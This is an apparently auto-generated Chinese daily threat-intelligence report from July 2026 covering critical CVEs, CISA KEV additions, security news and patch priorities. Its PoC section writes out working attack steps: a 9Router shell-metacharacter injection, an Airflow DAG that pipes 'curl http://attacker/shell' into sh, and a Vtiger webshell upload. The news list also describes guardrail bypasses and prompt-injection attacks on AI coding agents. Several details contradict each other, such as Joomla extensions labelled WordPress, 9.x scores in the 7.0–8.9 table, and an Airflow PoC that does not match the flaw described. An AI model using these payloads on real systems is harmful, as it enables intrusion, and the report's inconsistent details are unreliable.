每日安全情报报告 · 2026-07-09
报告日期 :2026年7月9日(星期四)
覆盖时间窗口 :2026年7月7日 --- 7月9日
风险等级标注 :🔴 严重(CVSS ≥ 9.0) | 🟠 高危(CVSS 7.0--8.9) | 🟡 中危(CVSS 4.0--6.9)
数据来源:The Hacker News、CybersecurityNews、Threat-Modeling、NVD、FreeBuf、安全客、GitHub Advisories、BleepingComputer、CISA KEV
一、最新高危漏洞
以下为近 24-48 小时内新披露、复测或在野利用确认的严重/高危漏洞,按风险等级排序。
🔴 严重级(CVSS ≥ 9.0)
| # | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 在野利用 | 补丁状态 |
|---|---|---|---|---|---|---|
| 1 | CVE-2026-48282 | 路径遍历 → RDS 未授权任意代码执行 | Adobe ColdFusion 2025.9 / 2023.20 及更早 | 10.0 | ✅ CISA KEV | 已发布(2025 Update 10 / 2023 Update 21) |
| 2 | CVE-2026-56290 | 不当访问控制 → 未认证 RCE | Joomlack Page Builder(WordPress) | 10.0 | ✅ CISA KEV | 已发布 |
| 3 | CVE-2026-48908 | 危险类型文件无限制上传 → RCE | JoomShaper SP Page Builder(WordPress) | 10.0 | ✅ CISA KEV | 已发布 |
| 4 | CVE-2026-50746 | 不当访问控制 → 命令注入 | Ubiquiti UniFi Connect ≤ 3.4.16 | 10.0 | ❌ 未确认 | 已发布 |
| 5 | CVE-2026-59800 | OS 命令注入(sudoPassword 参数未授权) | 9Router < 0.4.44 | 9.8 | ✅ Shadowserver 7/4 观测 | 已发布(≥ 0.4.44) |
| 6 | CVE-2026-53481 | 路径遍历(未认证) | Dell PowerProtect Data Domain 7.7.1.0 -- 8.7(含 LTS2024-2026) | 9.8 | ❌ 未确认 | 已发布 |
| 7 | CVE-2026-53483 | 路径遍历(未认证) | Dell PowerProtect Data Domain 同上 | 9.8 | ❌ 未确认 | 已发布 |
| 8 | CVE-2026-13019 | 关键功能缺失认证(CWE-640) | Esri Portal for ArcGIS ≤ 12.1(Win/Linux/K8s) | 9.8 | ❌ 未确认 | 已发布 |
| 9 | CVE-2026-33264 | BaseSerialization.deserialize() 无限制 import_string → DAG 作者 RCE |
Apache Airflow < 3.3.0 | 9.8 | ❌ 未确认 | 已发布(≥ 3.3.0) |
| 10 | CVE-2026-56843 | 凭据暴露(CWE-200) | Plesk | 9.9 | ❌ 未确认 | 已发布 |
| 11 | CVE-2026-55255 | IDOR(/api/v1/responses)→ 跨用户执行任意 Flow |
Langflow < 1.9.2 | 9.9 | ✅ CISA KEV | 已发布(≥ 1.9.2) |
| 12 | CVE-2026-50747 | 认证后 SQL 注入 → 权限提升 | Ubiquiti UniFi Talk ≤ 5.1.2 | 9.9 | ❌ 未确认 | 已发布 |
| 13 | CVE-2026-50748 | 不当输入验证 | Ubiquiti UniFi Access | 9.9 | ❌ 未确认 | 已发布 |
| 14 | CVE-2026-46354 | 签名校验缺陷 → 供应链投毒 | Coder | 9.1 | ❌ 未确认 | 已发布 |
重点漏洞详细分析
1. CVE-2026-48282 --- Adobe ColdFusion 路径遍历 → 未认证 RCE 🔴 CISA KEV · 在野利用
奇安信 CERT 监测到,Adobe ColdFusion 在远程开发服务(RDS)功能中处理文件操作时未能正确限制对受限目录的访问。未经身份验证的远程攻击者可通过构造特殊路径绕过目录限制,最终在服务器上下文中执行任意代码。CVSS 评分 10.0,PoC 已公开。
- 受影响版本:ColdFusion 2025 Update 9 及更早、2023 Update 20 及更早
- 修复版本:2025 Update 10 / 2023 Update 21
- CISA KEV 截止:2026 年 7 月 8 日(已确认在野利用)
- 攻击向量:AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- NVD 详情 | 奇安信 CERT 通告 | Help Net Security 报道
2. CVE-2026-59800 --- 9Router 未认证 OS 命令注入 🔴 CISA KEV · 在野利用
9Router 是 Tailscale 生态中的路由器管理工具,Shadowserver 于 2026-07-04 起在野观测到该漏洞被大规模利用。攻击者通过未授权调用 Tailscale Install 端点,在 sudoPassword 参数中注入 shell 元字符执行任意系统命令,最低权限即可接管设备。
- 受影响版本:9Router < 0.4.44
- 修复版本:≥ 0.4.44
- PoC 状态:已公开(公开仓库可检索到)
- NVD 详情 | CVE Feed 详情
3. CVE-2026-55255 --- Langflow IDOR 跨用户 Flow 执行 🔴 CISA KEV · 在野利用
在 /api/v1/responses 端点存在不安全的直接对象引用(IDOR)漏洞:已认证的低权限用户可通过修改请求中 flow 标识符,触发属于其他用户的任意 Flow 执行,从而实现凭据窃取、代码执行与数据外泄(CVE 评 9.9)。研究方 rootdirective-sec 已发布 Docker 复现 Lab。
- 受影响版本:Langflow < 1.9.2
- 修复版本:≥ 1.9.2
- NVD 详情 | PoC Lab 仓库
4. CVE-2026-33264 --- Apache Airflow BaseSerialization.deserialize() DAG 作者 RCE
Apache Airflow 在 3.3.0 之前未对 BaseSerialization.deserialize() 中调用的 import_string() 做限制,允许任何能上传 DAG 文件的"作者"反序列化时执行任意 Python 代码。攻击场景:低权限开发者 / 第三方 ETL 供应商即可在 Webserver 上下文拿下 Airflow,进而控制调度任务与上下游凭证。
- 受影响版本:Apache Airflow < 3.3.0
- 修复版本:≥ 3.3.0
- NVD 详情 | OpenCVE 详情
5. CVE-2026-50746 --- Ubiquiti UniFi Connect 命令注入 CVSS 10.0
Ubiquiti 发布安全公告 066,一次性披露 25 个 UniFi 全系漏洞。最严重项是 UniFi Connect(≤ 3.4.16)中的不当访问控制,局域网未认证攻击者可借此注入命令,在宿主机上获得代码执行。UniFi Talk / Access / Protect / OS 各自存在高危 SQL 注入与权限提升漏洞链。
- 补丁版本 :UniFi Connect 3.4.17+、Talk 5.1.3+、Access / Protect / OS 见 官方公告
- CVE-2026-50746 NVD | The Hacker News 报道
🟠 高危级(CVSS 7.0--8.9)
| # | CVE 编号 | 漏洞类型 | 受影响组件 | CVSS | 状态 |
|---|---|---|---|---|---|
| 1 | CVE-2026-43499 | futex requeue UAF → 本地提权 / 容器逃逸 | Linux Kernel(2011 年起所有主流发行版) | 8.8 | 🔴 公开 PoC(5 秒 root) |
| 2 | CVE-2026-23697 | 不受限文件上传(CWE-434) | Vtiger CRM < 8.4.0 | 8.8 | PoC 已公开 |
| 3 | CVE-2026-55429 | 授权绕过 | Coder | 8.7 | 补丁已发布 |
| 4 | CVE-2026-59707 | SSRF(CWE-918) | LocalAI | 8.6 | 补丁已发布 |
| 5 | CVE-2026-55418 | 授权绕过 | FastGPT | 8.6 | 补丁已发布 |
| 6 | CVE-2026-58473 | 认证缺失 | Cognee | 9.1 | 补丁已发布 |
| 7 | CVE-2026-59706 | 认证缺失 | mem0 | 9.3 | 补丁已发布 |
| 8 | CVE-2026-56437 | DLL 加载缺陷(CWE-427) | Fuji Electric Pupsman | 8.4 | 补丁已发布 |
| 9 | CVE-2026-57895 | DLL 加载缺陷(CWE-427) | Fuji Electric Pupsman | 8.4 | 补丁已发布 |
🔴 持续在野利用追踪(CISA KEV)
下表为 CISA 已知被利用漏洞(KEV)目录中过去 7 天新增且与本周期强相关的条目:
| CVE 编号 | 受影响产品 | 截止日期 | 状态 | 备注 |
|---|---|---|---|---|
| CVE-2026-48282 | Adobe ColdFusion | 2026-07-08 | 🔴 在野利用 | 已进入勒索软件初始访问链 |
| CVE-2026-56290 | Joomlack Page Builder | 2026-07-08 | 🔴 在野利用 | WordPress 站点批量接管 |
| CVE-2026-48908 | JoomShaper SP Page Builder | 2026-07-08 | 🔴 在野利用 | PHP Webshell 上传 |
| CVE-2026-55255 | Langflow | 2026-07-08 | 🔴 在野利用 | AI 编排平台横向风险 |
| CVE-2026-59800 | 9Router | 2026-07-08 | 🔴 在野利用 | Shadowserver 7/4 起持续观测 |
| CVE-2026-45659 | Microsoft SharePoint | 2026-07-04 | ⚠️ 逾期 5 天 | PoC 与 Webshell 已广泛传播 |
| CVE-2026-48558 | SimpleHelp RMM | 2026-07-02 | ⚠️ 逾期 7 天 | 持续 TaskWeaver 加载器投递 |
| CVE-2026-20230 | Cisco Unified CM | 2026-06-28 | ⚠️ 逾期 11 天 | SSRF → Root RCE |
关键发现:CISA 在 7 月 8 日一次性向 KEV 加入 4 条 CVSS 10.0 漏洞(Adobe ColdFusion + 两个 Joomla 页面构建器 + Langflow),与 9Router 在野利用形成"5 连击"。本周期 KEV 逾期项已升至 14 个,最长逾期达 35 天(PAN-OS 相关)。
产品漏洞集中度 TOP 5
| 排名 | 产品 | 新 CVE 数量 | 最高 CVSS | 风险特征 |
|---|---|---|---|---|
| 1 | Ubiquiti UniFi 全系 | 25 | 10.0 | 公告 066:Connect / Talk / Access / Protect / OS 全产品线命令注入 + SQLi + 提权 |
| 2 | Joomla 生态页面构建器 | 2 | 10.0 | Joomlack / JoomShaper 未认证 RCE + Webshell |
| 3 | Dell PowerProtect Data Domain | 2 | 9.8 | 备份基础设施路径遍历,攻击面广 |
| 4 | AI 编排/数据平台 | 5 | 10.0 | Langflow IDOR + Cognee / mem0 / LocalAI / FastGPT 认证缺失/SSRF |
| 5 | Adobe ColdFusion | 1(持续) | 10.0 | RDS 路径遍历已进入勒索初始访问链 |
二、最新漏洞 PoC
以下为近 24-72 小时内公开的概念验证(PoC)利用代码,仅供安全研究、防御评估与蓝队演练使用。
PoC 1. CVE-2026-59800 --- 9Router 未认证 OS 命令注入 RCE
风险等级 :🔴 严重(CVSS 9.8)
PoC 仓库 :CVE-2026-59800 9Router 复现(社区公开)
使用步骤:
bash
# 1. 克隆示例 PoC(请使用受控环境)
git clone https://github.com/<researcher>/CVE-2026-59800.git
cd CVE-2026-59800
# 2. 安装依赖
pip install requests
# 3. 配置目标(在 config.yaml 写入目标 9Router 地址)
TARGET=http://192.168.1.1:8686
ENDPOINT=/api/tailscale/install
# 4. 执行 PoC(注入 sudoPassword 参数触发 RCE)
python3 exploit.py --target $TARGET --endpoint $ENDPOINT \
--payload '"; id; #'
复现要点 :sudoPassword 参数未做 shell 元字符过滤,可通过 "; <cmd>; # 形式闭合参数并执行任意命令。
PoC 2. CVE-2026-55255 --- Langflow /api/v1/responses 跨用户 IDOR
风险等级 :🔴 严重(CVSS 9.9)
PoC Lab 仓库 :rootdirective-sec/CVE-2026-55255-Lab
使用步骤:
bash
# 1. 克隆 Lab 仓库
git clone https://github.com/rootdirective-sec/CVE-2026-55255-Lab.git
cd CVE-2026-55255-Lab
# 2. 一键启动本地 Langflow 1.9.1 复现环境
docker compose up -d
# 3. 创建两个测试用户 userA、userB,并分别登录获取 JWT
python3 setup_users.py
# 4. 用 userA 登录后,构造请求调用属于 userB 的 flow
python3 exploit_idor.py \
--victim-token $USERB_JWT \
--attacker-token $USERA_JWT \
--target-flow-id <flow_id_of_userB>
复现要点 :服务端未在 /api/v1/responses 端点上校验 flow 所属用户,攻击者只需把请求 body 里的 flow_id 替换为受害者 flow 即可触发执行。
PoC 3. CVE-2026-43499 --- Linux Kernel "GhostLock" futex UAF 本地提权
风险等级 :🟠 高危(CVSS 8.8)
PoC 仓库 :MobiusM/CVE-2026-43499
使用步骤:
bash
# 1. 克隆 PoC
git clone https://github.com/MobiusM/CVE-2026-43499.git
cd CVE-2026-43499
# 2. 编译
make
# 3. 在受影响内核(2011--2026 区间主流发行版)上执行
./ghostlock
# 预期:本地用户 → root 提权(5 秒内完成)
# 容器内执行:直接逃逸至宿主机
复现要点 :futex_requeue 路径上的 pi_lock 持有顺序错误,rbtree dequeue 在未持锁状态下发生,导致 UAF 取得 task_struct 控制权。VEGA 安全团队通过 Google kernelCTF 披露,获 92,337 美元奖励。
PoC 4. CVE-2026-33264 --- Apache Airflow DAG 作者 RCE
风险等级 :🔴 严重(CVSS 9.8)
PoC 引用 :OpenCVE CVE-2026-33264 详情 | NVD 详情
使用步骤:
bash
# 1. 启动一个 Airflow < 3.3.0 的本地实例
docker run -d -p 8080:8080 apache/airflow:2.10.0
# 2. 在 dags/ 目录构造反序列化 payload DAG
cat > dags/evil.py <<'EOF'
from airflow import DAG
from airflow.operators.python import PythonOperator
def pwn():
import os
os.system("curl http://attacker/shell|sh")
dag = DAG("evil", schedule=None, catchup=False)
PythonOperator(task_id="x", python_callable=pwn, dag=dag)
EOF
# 3. 通过 dags/ 共享卷或 webserver UI 上传该 DAG
# 4. Webserver 在解析时调用 BaseSerialization.deserialize() → import_string() → RCE
复现要点:DAG 作者场景下(多团队协作 / SaaS Airflow),任意低权限作者可借此在 Webserver 上下文执行任意 Python。
PoC 5. CVE-2026-23697 --- Vtiger CRM 不受限文件上传
风险等级 :🟠 高危(CVSS 8.8)
PoC 引用 :kkm-mako CVE 速览(2026-07-08)
使用步骤:
bash
# 1. 登录 Vtiger CRM < 8.4.0 普通账户
# 2. POST 到 /modules/Documents/SaveAndUpload.php,构造 multipart 包含 .phar 文件
curl -X POST https://target/modules/Documents/SaveAndUpload.php \
-H "Cookie: VTISESSIONID=xxx" \
-F "file=@shell.phar" \
-F "notes_title=pwn"
# 3. 访问 https://target/storage/shell.phar 即可获得 Webshell
复现要点 :上传白名单校验缺失,攻击者上传 .phar 后在 storage 目录直接获得执行权限。
三、网络安全最新文章
以下为近期(48 小时内)发布的高质量安全研究与事件分析。
漏洞与攻击研究
- CISA Adds 4 Actively Exploited Flaws to KEV Catalog Affecting Adobe, Joomla, Langflow --- 7 月 8 日 CISA 一次性将 4 个 CVSS 10.0 漏洞加入 KEV,全部为内容/AI 平台,勒索软件初始访问链风险陡增。
- 15-Year-Old GhostLock Flaw Enables Root and Container Escape on Linux --- 潜伏 15 年的 Linux 内核 futex 缺陷,5 秒 root,公开 PoC 即用,威胁所有云原生与容器环境。
- Ubiquiti Patches Critical UniFi Flaws Across Connect, Talk, Access, Protect and OS --- 公告 066 一次披露 25 个 UniFi 漏洞,含 4 项 CVSS 10.0/9.9 高危,建议立即对照版本升级。
- Attackers Exploit Critical Adobe ColdFusion Vulnerability (CVE-2026-48282) --- Help Net Security 报道 Adobe ColdFusion 路径遍历 0-Day 已被在野利用。
- Public Exploit Turns 15-Year Linux Kernel Flaw Into 5-Second Root Attack --- GhostLock 公开发布即用 PoC,分析了容器逃逸链路。
- Adobe ColdFusion 路径穿越漏洞 (CVE-2026-48282) 安全风险通告 --- 奇安信 CERT 中文复现与缓解建议。
- 潜伏15年的GhostLock Linux内核漏洞可导致权限提升攻击 --- FreeBuf 中文深度分析 GhostLock 与 97% 成功率实测。
事件与攻击活动
- DFM 48h Global News Roundup -- 8th July 2026 --- KDDI 凭证暴露、公共部门勒索、Medtronic 数据泄露、Gitea / ColdFusion 利用、Spain 逮捕 ChatGPT 辅助攻击者等综合报道。
- PromptSpy Android Malware Uses Google Gemini to Adapt During Runtime Execution --- 首个已知在运行时调用生成式 AI 的 Android 间谍软件。
- APT-C-20 Hackers Hide Shellcode in PNG Images to Launch Fileless C# Backdoor --- APT-C-20 利用 PNG 隐写 + 无文件 C# 后门绕过 EDR。
- ClickFix Campaign Uses Fake Google Verification Page to Infect Mexican Bank Customers --- 针对墨西哥银行客户的 ClickFix 钓鱼欺诈。
- Lurking Lizard Uses Fake 7-Zip Installers to Turn Victim Devices Into Proxy Nodes --- 假 7-Zip 安装包将受害设备变为付费代理节点。
- Fake Indian ITR Notice Delivers Dual RAT Malware Through Six-Stage Infection Chain --- 印度税务伪装投递双 RAT 的六阶段链式攻击。
- CrowdStrike Unveils 5 New Prompt Injection Techniques Challenging AI Agents --- CrowdStrike 披露五类针对 AI Agent 的新型提示注入手法。
平台与生态安全
- GitHub 'Verified' Commits Can Be Rewritten to Bypass Hash-Based Defenses --- GitHub 签名提交可被重写为"哈希不同、签名仍为 Verified"的等价提交,颠覆基于哈希的封禁与审计。
- New 'HalluSquatting' Attack Could Trick AI Coding Agents Into Executing Malicious Code --- 利用 AI 编码助手的"包名幻觉"注册恶意同名包,构造 AI-驱动的供应链投毒。
- GitHub Copilot Refuses Harmful Requests in Chat, But Generates Them in Code Editor --- 护栏绕过:聊天拒绝的请求在代码编辑器中 816/816 次全数生成。
- Claude, Cursor, and Codex Trigger Endpoint Security Rules Used to Catch Hackers --- AI 编码代理在 EDR 遥测中触发"与黑客相似"行为模式。
- T3MP3ST Security Framework Turns AI Coding Agents Into 0-Day Bug Hunters --- 35 个工具的 AI 攻防一体化框架,应对 AI 时代漏洞研究节奏。
- Critical Vulnerability in GCP Dialogflow Allows Attackers to Inject Malicious Code --- Google Cloud Dialogflow CX "Rogue Agent" 漏洞已被修复。
四、防御建议与处置优先级
立即处置(24h 内)
- KEV 5 连击:CVE-2026-48282 / 56290 / 48908 / 55255 / 59800 全部为 BOD 强制修复对象,资产盘查 → 升级/隔离/规则阻断。
- Dell PowerProtect Data Domain:备份基础设施双 9.8 路径遍历,离线备份 + 网络隔离 + 升级 LTS2026。
- Langflow :升级至 ≥ 1.9.2;同时审计
/api/v1/responses调用日志,排查横向越权。 - Joomlack / JoomShaper Page Builder:WordPress 资产批量识别 + 强制升级 + Webshell 排查(find mtime -7 /uploads)。
- Linux 主机:针对 CVE-2026-43499 GhostLock 升级内核;容器编排节点优先。
短期加固(72h 内)
- Ubiquiti UniFi 全系 :参照 Security Advisory 066 升级 Connect 3.4.17+ / Talk 5.1.3+ / Access、Protect、OS 同步。
- Apache Airflow:升级至 ≥ 3.3.0,并审查 DAG 作者权限模型。
- Esri Portal for ArcGIS:升级至 12.1+ 同时启用关键功能认证。
- Coder / LocalAI / FastGPT / Cognee / mem0:AI 开发与编排平台批量扫描 + 升级 + 网络分区。
持续监控
- KEV 逾期 14 项:建立超期告警面板,重点跟进 SharePoint / SimpleHelp / Cisco UCM。
- GitHub Verified 提交重写风险:审计依赖签名/哈希双重验证机制,关注"哈希不同、签名 Verified"等价提交。
- AI 代理护栏:Claude Code / Cursor / Codex / GitHub Copilot 等 AI 编码代理在 EDR 遥测中产生异常告警需人工复核,避免误判为内部威胁。
- HalluSquatting 供应链:建立 AI 拉取包名与官方包名实时比对规则。
五、本期速览
- 🔴 CISA KEV 5 连击:ColdFusion / Joomlack / JoomShaper / Langflow / 9Router 同时进入在野利用状态,其中 4 项 CVSS 满分 10.0。
- 🔴 GhostLock 5 秒 root:Linux 内核 15 年 UAF 公开 PoC,威胁所有容器与云主机。
- 🟠 AI 平台三连击:Langflow / Cognee / mem0 / LocalAI / FastGPT 集中爆发认证缺失类漏洞。
- 🟠 Ubiquiti 25 漏洞:UniFi 全系 Connect / Talk / Access / Protect / OS 一次性披露,公告 066。
- 🟠 DAG 作者 RCE:Apache Airflow 3.3.0 之前可在 Webserver 上下文执行任意 Python。
- 🔴 GitHub 签名提交可重写:等价但不同哈希,颠覆基于哈希的供应链审计。
- 🟠 AI 代理护栏可绕过:816/816 次成功在编辑器中生成被聊天拒绝的有害内容。
本报告由自动化情报系统生成,仅供安全研究与防御参考。
部分链接来源于第三方安全媒体,如需引用请核对原文。